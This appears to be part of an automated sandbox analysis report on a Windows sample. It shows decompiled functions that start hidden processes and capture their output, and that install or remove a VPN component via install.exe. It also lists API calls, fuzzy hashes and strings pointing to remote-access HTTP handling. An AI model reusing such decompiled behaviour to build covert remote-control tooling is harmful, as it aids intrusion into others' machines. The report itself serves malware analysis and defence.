                                                                                                                        						_t8 = _t2;
                                                                                                                        						 *((intOrPtr*)(_t7 + 4)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t7 + 8)) = 0;
                                                                                                                        						_t11 = _t8 - _t7;
                                                                                                                        						do {
                                                                                                                        							 *_t8 =  *((intOrPtr*)(_t7 + 4));
                                                                                                                        							 *((intOrPtr*)(_t7 + 4)) = _t8;
                                                                                                                        							_t11 = _t11 + 0x20;
                                                                                                                        							_t8 = _t8 + 0x20;
                                                                                                                        						} while (_t11 <= 0xfe0);
                                                                                                                        						_t9 =  *0x6f34095c; // 0x26b0000
                                                                                                                        						 *_t7 = _t9;
                                                                                                                        						 *0x6f34095c = _t7;
                                                                                                                        						return _t7;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					while( *((intOrPtr*)(_t7 + 4)) == 0) {
                                                                                                                        						_t7 =  *_t7;
                                                                                                                        						if(_t7 != 0) {
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							goto L4;
                                                                                                                        						}
                                                                                                                        						goto L8;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L8:
                                                                                                                        				return _t7;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,6F33A605,6F33B5E8,?,?,00000001,?,?,?,?,?,6F331FE4), ref: 6F33A5B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction ID: 72dd918ccd6ede2807c16e126ef80c7819221652ca170d7c072f4386f8058921
                                                                                                                        • Opcode Fuzzy Hash: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction Fuzzy Hash: C1F0C2B6F06170CFEF12CF54D944A487BE5BB1AB10B11C05AE444DF264C770E881CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33BB9C() {
                                                                                                                        				void* _t1;
                                                                                                                        
                                                                                                                        				_t1 = malloc(0x80); // executed
                                                                                                                        				 *0x6f34096c = _t1;
                                                                                                                        				 *0x6f340968 = _t1;
                                                                                                                        				if(_t1 != 0) {
                                                                                                                        					 *_t1 =  *_t1 & 0x00000000;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					return _t1 + 1;
                                                                                                                        				}
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2803490479-0
                                                                                                                        • Opcode ID: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction ID: e6359331db8f602e5497fcd84ee77876ba91257e942673c0af8f0fad1d7cb4bd
                                                                                                                        • Opcode Fuzzy Hash: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction Fuzzy Hash: CDC012F2722A01CAEB809B29880431936E8FB46332F1094AAE800C90A8EF308054CB00
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00500C8C
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • _strlen.LIBCMT ref: 00500CE4
                                                                                                                          • Part of subcall function 004FA79E: __EH_prolog3.LIBCMT ref: 004FA7A5
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA7B7
                                                                                                                          • Part of subcall function 004FA79E: _memset.LIBCMT ref: 004FA7DC
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA801
                                                                                                                          • Part of subcall function 004FA79E: select.WS2_32 ref: 004FA86F
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA886
                                                                                                                          • Part of subcall function 004FA79E: ioctlsocket.WS2_32(?,4004667F,?), ref: 004FA8A9
                                                                                                                        • _strlen.LIBCMT ref: 00500E5E
                                                                                                                        • _strlen.LIBCMT ref: 00500FE1
                                                                                                                        • _strncpy.LIBCMT ref: 00501002
                                                                                                                          • Part of subcall function 004FECF5: __time32.LIBCMT ref: 004FED0C
                                                                                                                          • Part of subcall function 004FECF5: shutdown.WS2_32(00836C40,00000001), ref: 004FED20
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CountH_prolog3Tick_strlen$CriticalSection$DeleteH_prolog3_catchInitialize__time32_memset_strncpyioctlsocketselectshutdown
                                                                                                                        • String ID: $ HTTP/1$ NC.HttpInit.Failed1$ NC.HttpInit.Failed10$ NC.HttpInit.Failed2$ NC.HttpInit.Failed3$ NC.HttpInit.Failed4$ NC.HttpInit.Failed5$ NC.HttpInit.Failed7$ NC.HttpInit.Failed8$ NC.HttpInit.Failed9$ NC.HttpInit.FastPOSTMissing$ NC.HttpInit.Header $ NC.HttpInit.ReGET$ NC.HttpInit.ReGET.Replace$ NC.HttpInit.ResendPacket $ NC.HttpInit.SendBuffered.Failed$ NC.HttpInit.WrongData$ NC.HttpInit.WrongPOSTorder Exp=$ Rec=$&data=$&id=$&p=$/JAVA/$/Java/$/java/$/selftest$000$123$<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-http-request-headers-from domain="*" headers="*" /><allow-access-from domain="*" /></cross-domain-policy>$<html><body>This site is running <a href='http://www.TeamViewer.com'>TeamViewer</a>.</body></html>$?s=$?s=00000000$?s=00000000&m=fast$Cache-control: no-cache$Connection: Keep-alive$Connection: Keep-alive$Connection: close$Connection: close$Content-Length: $Content-Type: application/octet-stream$Content-Type: text/html$Content-Type: text/xml$Content-length:$Content-length: 0$Content-length: 10$Content-length: 17$GET $GET /crossdomain.xml $HTTP$HTTP/1.0 200 OK$HTTP/1.0 400 Bad Request$HTTP/1.1$HTTP/1.1 200 OK$HandleHttpInit.NoGetSession$HandleHttpInit.NoPostSession$NC.IP-Block GET-Init $POST $Tz$X-Connection: close$X-Lasterror: $fast
                                                                                                                        • API String ID: 2298429837-3936837734
                                                                                                                        • Opcode ID: 35be16c33e76b4bf5acb9c687b671e697c727d9958302983b0fa89060d3d00cd
                                                                                                                        • Instruction ID: 126e56028416a6afb7c9dafa6e9211db950bf1ab97138c0668dce98b9ec09594
                                                                                                                        • Opcode Fuzzy Hash: 35be16c33e76b4bf5acb9c687b671e697c727d9958302983b0fa89060d3d00cd
                                                                                                                        • Instruction Fuzzy Hash: 7EE21670D05289AADB15EBA5C956BEE7FB8AF61304F10405EF401771D2EB781F08CB6A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F332ED0(intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _v4;
                                                                                                                        				signed int _v8;
                                                                                                                        				CHAR* _v12;
                                                                                                                        				intOrPtr _v16;
                                                                                                                        				struct _STARTUPINFOA _v84;
                                                                                                                        				struct _PROCESS_INFORMATION _v100;
                                                                                                                        				void* _v108;
                                                                                                                        				void* _v112;
                                                                                                                        				CHAR* _v116;
                                                                                                                        				void* _v120;
                                                                                                                        				void* _v124;
                                                                                                                        				void* _v128;
                                                                                                                        				intOrPtr _v132;
                                                                                                                        				long _v136;
                                                                                                                        				CHAR* _t52;
                                                                                                                        				int _t54;
                                                                                                                        				long _t69;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				long _t85;
                                                                                                                        				void* _t90;
                                                                                                                        				struct _OVERLAPPED* _t110;
                                                                                                                        				void* _t111;
                                                                                                                        				int _t112;
                                                                                                                        				int _t116;
                                                                                                                        				void* _t121;
                                                                                                                        
                                                                                                                        				_t110 = 0;
                                                                                                                        				_v116 = 0;
                                                                                                                        				_t90 = 0;
                                                                                                                        				_v100.hThread.nLength = 0xc;
                                                                                                                        				_v100.dwProcessId = 0;
                                                                                                                        				_v100.dwThreadId = 1;
                                                                                                                        				_v112 = 0;
                                                                                                                        				_v108 = 0;
                                                                                                                        				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
                                                                                                                        					 *_a12 = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_push(0x44);
                                                                                                                        					_push( &(_v84.dwX));
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t52 = _v116;
                                                                                                                        					_push(0x10);
                                                                                                                        					_push( &(_v100.dwProcessId));
                                                                                                                        					_v84.lpDesktop = 0x44;
                                                                                                                        					_v84.lpReserved2 = 0x101;
                                                                                                                        					_v12 = _t52;
                                                                                                                        					_v16 = _t52;
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
                                                                                                                        					CloseHandle(_v124);
                                                                                                                        					if(_t54 != 0) {
                                                                                                                        						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
                                                                                                                        						_v120 = _t111;
                                                                                                                        						if(_t111 != 0) {
                                                                                                                        							_v116 = GetTickCount() + _v8 * 0x3e8;
                                                                                                                        							_v136 = 0;
                                                                                                                        							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
                                                                                                                        								while(1) {
                                                                                                                        									_t69 = _v136;
                                                                                                                        									if(_t69 == 0) {
                                                                                                                        										goto L23;
                                                                                                                        									}
                                                                                                                        									 *((char*)(_t69 + _t111)) = 0;
                                                                                                                        									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
                                                                                                                        									if(_t116 != 0) {
                                                                                                                        										_t31 = _t116 + 2; // 0x2
                                                                                                                        										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
                                                                                                                        										if(_t121 != 0) {
                                                                                                                        											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
                                                                                                                        												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
                                                                                                                        												if(_t112 != 0) {
                                                                                                                        													_t82 = _v132 + _t112;
                                                                                                                        													_v132 = _t82;
                                                                                                                        													_push(_t82 + 1);
                                                                                                                        													if(_t90 != 0) {
                                                                                                                        														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
                                                                                                                        														if(_t85 != 0) {
                                                                                                                        															goto L12;
                                                                                                                        														} else {
                                                                                                                        															HeapFree(GetProcessHeap(), _t85, _t90);
                                                                                                                        															_t90 = 0;
                                                                                                                        															goto L14;
                                                                                                                        														}
                                                                                                                        														goto L24;
                                                                                                                        													} else {
                                                                                                                        														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
                                                                                                                        														L12:
                                                                                                                        														_t90 = _t85;
                                                                                                                        														if(_t90 != 0) {
                                                                                                                        															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L14:
                                                                                                                        												_t111 = _v120;
                                                                                                                        											}
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t121);
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									if(GetTickCount() >= _v116 || _t90 == 0) {
                                                                                                                        										_push(0);
                                                                                                                        										_push(_v100.hProcess);
                                                                                                                        										L6F33C30C();
                                                                                                                        									} else {
                                                                                                                        										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									goto L23;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L23:
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t111);
                                                                                                                        						}
                                                                                                                        						L24:
                                                                                                                        						CloseHandle(_v100.hThread);
                                                                                                                        						CloseHandle(_v100);
                                                                                                                        						_t110 = _v132;
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v128);
                                                                                                                        					 *_v4 = _t110;
                                                                                                                        					return _t90;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        APIs
                                                                                                                        • CreatePipe.KERNEL32 ref: 6F332F09
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F332F20
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F332F4E
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6F332F71
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F332F84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F95
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F332F9C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F332FB0
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F332FDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F33300E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333025
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F33302C
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F333048
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333063
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333081
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333088
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6F3330AB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F3330BF
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3330C5
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F3330E7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6F3330FA
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333101
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33310D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333114
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F333125
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33312D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333134
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333145
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F33314C
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333157
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                                        • Opcode ID: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction ID: c56d1d7cf3803eb3caa04411d334526c855fb94d2ac1a9ef05d1e66a5cf51e63
                                                                                                                        • Opcode Fuzzy Hash: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction Fuzzy Hash: 65718C72A44385ABE720DFA5CC49F5BBBEDFBC9B10F00491DB645D7280DAB0E4148B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F3344D0(void* __ebx, void* __edi) {
                                                                                                                        				CHAR* _t35;
                                                                                                                        				int _t36;
                                                                                                                        				char _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				int _t46;
                                                                                                                        				CHAR* _t47;
                                                                                                                        				void* _t50;
                                                                                                                        				void* _t55;
                                                                                                                        				CHAR* _t57;
                                                                                                                        				void* _t64;
                                                                                                                        				void* _t65;
                                                                                                                        				void* _t66;
                                                                                                                        				CHAR* _t67;
                                                                                                                        				CHAR* _t69;
                                                                                                                        				signed int _t70;
                                                                                                                        				signed int _t74;
                                                                                                                        				CHAR* _t78;
                                                                                                                        				void* _t79;
                                                                                                                        				CHAR* _t82;
                                                                                                                        				char _t83;
                                                                                                                        				void* _t84;
                                                                                                                        				CHAR* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t88;
                                                                                                                        				void* _t89;
                                                                                                                        				intOrPtr _t92;
                                                                                                                        				intOrPtr _t93;
                                                                                                                        				CHAR* _t94;
                                                                                                                        				void* _t96;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t100;
                                                                                                                        
                                                                                                                        				_t89 = __edi;
                                                                                                                        				_t66 = __ebx;
                                                                                                                        				 *(_t98 + 0xc) = 0;
                                                                                                                        				if(M6F340544 == 0) {
                                                                                                                        					L23:
                                                                                                                        					return  *(_t98 + 0xc);
                                                                                                                        				} else {
                                                                                                                        					_t35 = M6F3404CC; // 0xa32d38
                                                                                                                        					_t69 = M6F3404D8; // 0xa55cd8
                                                                                                                        					_t82 = M6F3404DC; // 0xa55ca8
                                                                                                                        					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
                                                                                                                        					_t93 =  *((intOrPtr*)(_t98 + 0x38));
                                                                                                                        					if(_t93 != 0 || _t36 != 0) {
                                                                                                                        						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							_t64 = M6F3404D8; // 0xa55cd8
                                                                                                                        							_t65 = E6F3338A0(_t64, 0, 0, 1);
                                                                                                                        							_t98 = _t98 + 0x10;
                                                                                                                        							if(_t65 == (0 | _t93 == 0x00000000)) {
                                                                                                                        								goto L7;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L23;
                                                                                                                        					} else {
                                                                                                                        						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
                                                                                                                        							L7:
                                                                                                                        							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        							if(_t96 != 0) {
                                                                                                                        								_t83 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        								_push(_t66);
                                                                                                                        								_push(_t89);
                                                                                                                        								wsprintfA(_t96, "%s%s%s", _t83, "vpn", ".cab");
                                                                                                                        								_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        								_t7 = _t96 + 0x201; // 0x201
                                                                                                                        								_t67 = _t7;
                                                                                                                        								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", _t40, "vpn", 0x5c);
                                                                                                                        								_t42 = E6F332DC0(_t96, _t67, 0);
                                                                                                                        								_t98 = _t98 + 0x34;
                                                                                                                        								if(_t42 != 0) {
                                                                                                                        									_t70 = M6F3404EC; // 0x1
                                                                                                                        									asm("sbb ecx, ecx");
                                                                                                                        									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
                                                                                                                        									_t9 =  &(_t67[0x401]); // 0x602
                                                                                                                        									_t94 = _t9;
                                                                                                                        									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
                                                                                                                        									_t99 = _t98 + 0x28;
                                                                                                                        									_t47 =  &(( &(_t94[1]))[_t46]);
                                                                                                                        									 *(_t99 + 0x10) = _t47;
                                                                                                                        									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
                                                                                                                        										_t84 = M6F3404D8; // 0xa55cd8
                                                                                                                        										wsprintfA(_t47, "%s %s", "remove", _t84);
                                                                                                                        										_t100 = _t99 + 0x10;
                                                                                                                        									} else {
                                                                                                                        										_t79 = M6F3404D8; // 0xa55cd8
                                                                                                                        										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
                                                                                                                        										_t100 = _t99 + 0x1c;
                                                                                                                        									}
                                                                                                                        									_t74 =  *(_t100 + 0x10);
                                                                                                                        									_push(_t100 + 0x14);
                                                                                                                        									_push(0x1e);
                                                                                                                        									_push(0);
                                                                                                                        									 *(_t100 + 0x2c) = 0;
                                                                                                                        									_t50 = E6F334230(0, _t94, _t74);
                                                                                                                        									_t98 = _t100 + 0x18;
                                                                                                                        									if(_t50 != 0) {
                                                                                                                        										if(E6F334300() != 0) {
                                                                                                                        											_t88 = M6F3404D8; // 0xa55cd8
                                                                                                                        											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
                                                                                                                        											_t74 =  *(_t98 + 0x20);
                                                                                                                        											_push(0);
                                                                                                                        											_push(0x1e);
                                                                                                                        											_push(0);
                                                                                                                        											E6F334230(0, _t94, _t74);
                                                                                                                        											_t98 = _t98 + 0x28;
                                                                                                                        										}
                                                                                                                        										_t92 =  *((intOrPtr*)(_t98 + 0x44));
                                                                                                                        										if(_t92 == 0) {
                                                                                                                        											_t55 = M6F3404D8; // 0xa55cd8
                                                                                                                        											E6F333700(_t55, 1);
                                                                                                                        											_t98 = _t98 + 8;
                                                                                                                        										} else {
                                                                                                                        											_t87 = M6F3404D8; // 0xa55cd8
                                                                                                                        											E6F3338A0(_t87, 0, 0, 0);
                                                                                                                        											_t98 = _t98 + 0x10;
                                                                                                                        										}
                                                                                                                        										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
                                                                                                                        											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
                                                                                                                        											_t94[1] = 0;
                                                                                                                        											_t86 = M6F3404CC; // 0xa32d38
                                                                                                                        											_t57 = M6F3404D8; // 0xa55cd8
                                                                                                                        											_t78 = M6F3404DC; // 0xa55ca8
                                                                                                                        											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
                                                                                                                        											 *((intOrPtr*)(_t98 + 0x18)) = 1;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        									_push(0x1e);
                                                                                                                        									_push(_t98 + 0x24);
                                                                                                                        									 *((short*)( *((intOrPtr*)(_t98 + 0x1c)) + _t67 - 1)) = 0;
                                                                                                                        									L6F33C2EE();
                                                                                                                        									 *((intOrPtr*)(_t98 + 0x28)) = 3;
                                                                                                                        									 *(_t98 + 0x2c) = _t67;
                                                                                                                        									 *((short*)(_t98 + 0x34)) = 0x614;
                                                                                                                        									SHFileOperationA(_t98 + 0x20);
                                                                                                                        								}
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t96);
                                                                                                                        							}
                                                                                                                        							goto L23;
                                                                                                                        						} else {
                                                                                                                        							return _t36;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



































                                                                                                                        0x6f334694
                                                                                                                        0x6f334697
                                                                                                                        0x6f33469d
                                                                                                                        0x6f3346b6
                                                                                                                        0x6f3346be
                                                                                                                        0x6f3346c3
                                                                                                                        0x6f33469f
                                                                                                                        0x6f33469f
                                                                                                                        0x6f3346ac
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346b1
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f3346d5
                                                                                                                        0x6f3346d7
                                                                                                                        0x6f3346db
                                                                                                                        0x6f3346e1
                                                                                                                        0x6f3346e6
                                                                                                                        0x6f3346f0
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346f6
                                                                                                                        0x6f3346cb
                                                                                                                        0x6f334702
